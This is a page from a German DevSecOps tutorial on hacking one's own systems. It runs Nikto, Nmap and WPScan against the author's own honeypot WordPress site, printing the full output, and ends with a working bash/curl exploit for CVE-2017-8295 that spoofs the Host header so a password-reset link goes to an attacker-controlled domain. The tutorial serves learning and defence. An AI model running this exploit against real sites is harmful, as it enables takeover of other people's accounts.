DevSecOps – selbst hacken und dabei lernen
Seite 2: Welcome to the Next Level
Im nächsten Schritt versucht man sich selbst als Hacker an seiner eigenen Anwendung oder dem eigenen System – getreu dem Motto: Kenne deinen Feind. An dieser Stelle noch mal der Hinweis, dass Hacken ohne Einverständnis des Domain- oder Systeminhabers illegal ist.
Zur Vereinfachung wird ein Docker-basiertes Beispiel genutzt:
Im Beispielprojekt ist eine angreifbare Spring-Boot-Variante als Docker-Container enthalten, die von der Kali-Konsole aus attackiert wird.
Hack yourself
Da die Ziele identifiziert wurden, kann man nun mit Nmap oder Nikto nach Diensten zu scannen. Das installierte WordPress kommt direkt aus den Paketquellen von Debian 9. Ansonsten wurde keine Änderung der Standard-Debian-Konfiguration vorgenommen. Nikto liefert nützliche Punkte zu möglichen Angriffen:
root@60808f78e55d:/# nikto -C all -host honeypot-wp.holisticon.de
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 195.201.92.37
+ Target Hostname: honeypot-wp.holisticon.de
+ Target Port: 80
+ Start Time: 2018-05-18 15:39:44 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://195.201.92.37/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 6 item(s) reported on remote host
+ End Time: 2018-05-22 03:07:37 (GMT0) (434 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ ERROR 302: Update failed, please notify sullo@cirt.net of this code.
Zusätzlich gibt Nmap darüber Auskunft, welche Dienste zur Verfügung stehen:
root@60808f78e55d:/# nmap -Pn -sV --version-all --reason -v honeypot-wp.holisticon.de
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-21 09:12 UTC
NSE: Loaded 43 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 09:12
Completed Parallel DNS resolution of 1 host. at 09:12, 0.00s elapsed
Initiating SYN Stealth Scan at 09:12
Scanning honeypot-wp.holisticon.de (195.201.92.37) [1000 ports]
Discovered open port 80/tcp on 195.201.92.37
Discovered open port 22/tcp on 195.201.92.37
Completed SYN Stealth Scan at 09:12, 3.39s elapsed (1000 total ports)
Initiating Service scan at 09:12
Scanning 2 services on honeypot-wp.holisticon.de (195.201.92.37)
Completed Service scan at 09:13, 6.11s elapsed (2 services on 1 host)
NSE: Script scanning 195.201.92.37.
Initiating NSE at 09:13
Completed NSE at 09:13, 0.20s elapsed
Initiating NSE at 09:13
Completed NSE at 09:13, 0.00s elapsed
Nmap scan report for honeypot-wp.holisticon.de (195.201.92.37)
Host is up, received user-set (0.043s latency).
rDNS record for 195.201.92.37: static.37.92.201.195.clients.your-server.de
Not shown: 995 closed ports
Reason: 995 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 37 OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
80/tcp open http syn-ack ttl 37 Apache httpd 2.4.25 ((Debian))
135/tcp filtered msrpc no-response
139/tcp filtered netbios-ssn no-response
445/tcp filtered microsoft-ds no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.08 seconds
Raw packets sent: 1055 (46.420KB) | Rcvd: 1396 (73.430KB)
Es wurden nur zwei Dienste gefunden: SSH und HTTP. Der SSH-Server verrät die Version und damit auch die Debian-Version. Daneben wissen Angreifer gleich, welches Apache-Release und welche Version von Debian eingesetzt wird, obwohl Nmap das nicht direkt anzeigt. Der nächste Schritt ist, die Seite im Browser aufzurufen. Dabei stellt man schnell fest, dass es sich um einen WordPress-Blog handelt. Angreifer können bequem in den Quelltext nach "generator" suchen, um die Version zu erhalten:
Nun kann sie WPScan zum Scannen von WordPress nutzen:
root@60808f78e55d:/# wpscan honeypot-wp.holisticon.de
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: http://honeypot-wp.holisticon.de/
[+] Started: Tue May 22 03:11:32 2018
[!] The WordPress 'http://honeypot-wp.holisticon.de/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://195.201.92.37/index.php/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.25 (Debian)
[+] XML-RPC Interface available under: http://honeypot-wp.holisticon.de/xmlrpc.php
[+] WordPress version 4.7.5 (Released on 2017-05-16) identified from links opml, meta generator
[!] 17 vulnerabilities identified from the version number
[!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
Reference: https://wpvulndb.com/vulnerabilities/8807
Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
Reference: https://core.trac.wordpress.org/ticket/25239
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
...
[+] WordPress theme in use: twentyseventeen - v1.6
[+] Name: twentyseventeen - v1.6
| Latest version: 1.6 (up to date)
...
[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Finished: Tue May 22 03:11:47 2018
[+] Requests Done: 386
[+] Memory used: 17.395 MB
[+] Elapsed time: 00:00:15
CVE-2017-8295 ist ein guter Angriffspunkt. Mithilfe dieser Lücke können Angreifer Password-Reset-Mails an beliebige Mailserver umleiten und so an den kritischen Link gelangen. Das funktioniert, da WordPress beziehungsweise Apache in der Standardkonfiguration den Host-Header eins zu eins für diverse Mail-Header in der ausgehenden Mail benutzt. Wie das genau abläuft, lässt sich in der Exploit-DB nachlesen. Ein Angriff würde also beispielsweise so aussehen:
FAKE_DOMAIN=$1
DOMAIN=$2
USERNAME=$3
echo -e "\nAttempting to reset the password for '$USERNAME' on $DOMAIN:";
RESPONSE=$(curl --write-out %{http_code} --silent --output /dev/null \
-X POST "http://$DOMAIN/wp-login.php?action=lostpassword" \
-H 'cache-control: no-cache' \
-H 'content-type: application/x-www-form-urlencoded' \
-H "host: $FAKE_DOMAIN" \
-H "origin: $DOMAIN" \
-H "referer: $DOMAIN/wp-login.php?action=lostpassword" \
-d user_login=$USERNAME \
-d redirect_to= \
-d wp-submit=Get+New+Password)
# A 302 response indicates the user was redirected to the confirmation screen.
if [ "$RESPONSE" == "302" ]; then
echo -e "> Uh yeah, it appears that we took over $DOMAIN.\n"
else
if [ "$RESPONSE" == "500" ]; then
echo -e "> Uh yeah, it appears that we took over $DOMAIN, but the mailing seems to be not configured.\n"
else
echo -e "> $RESPONSE: Good news! $DOMAIN appears to be safe from this exploit.\n"
fi
fi
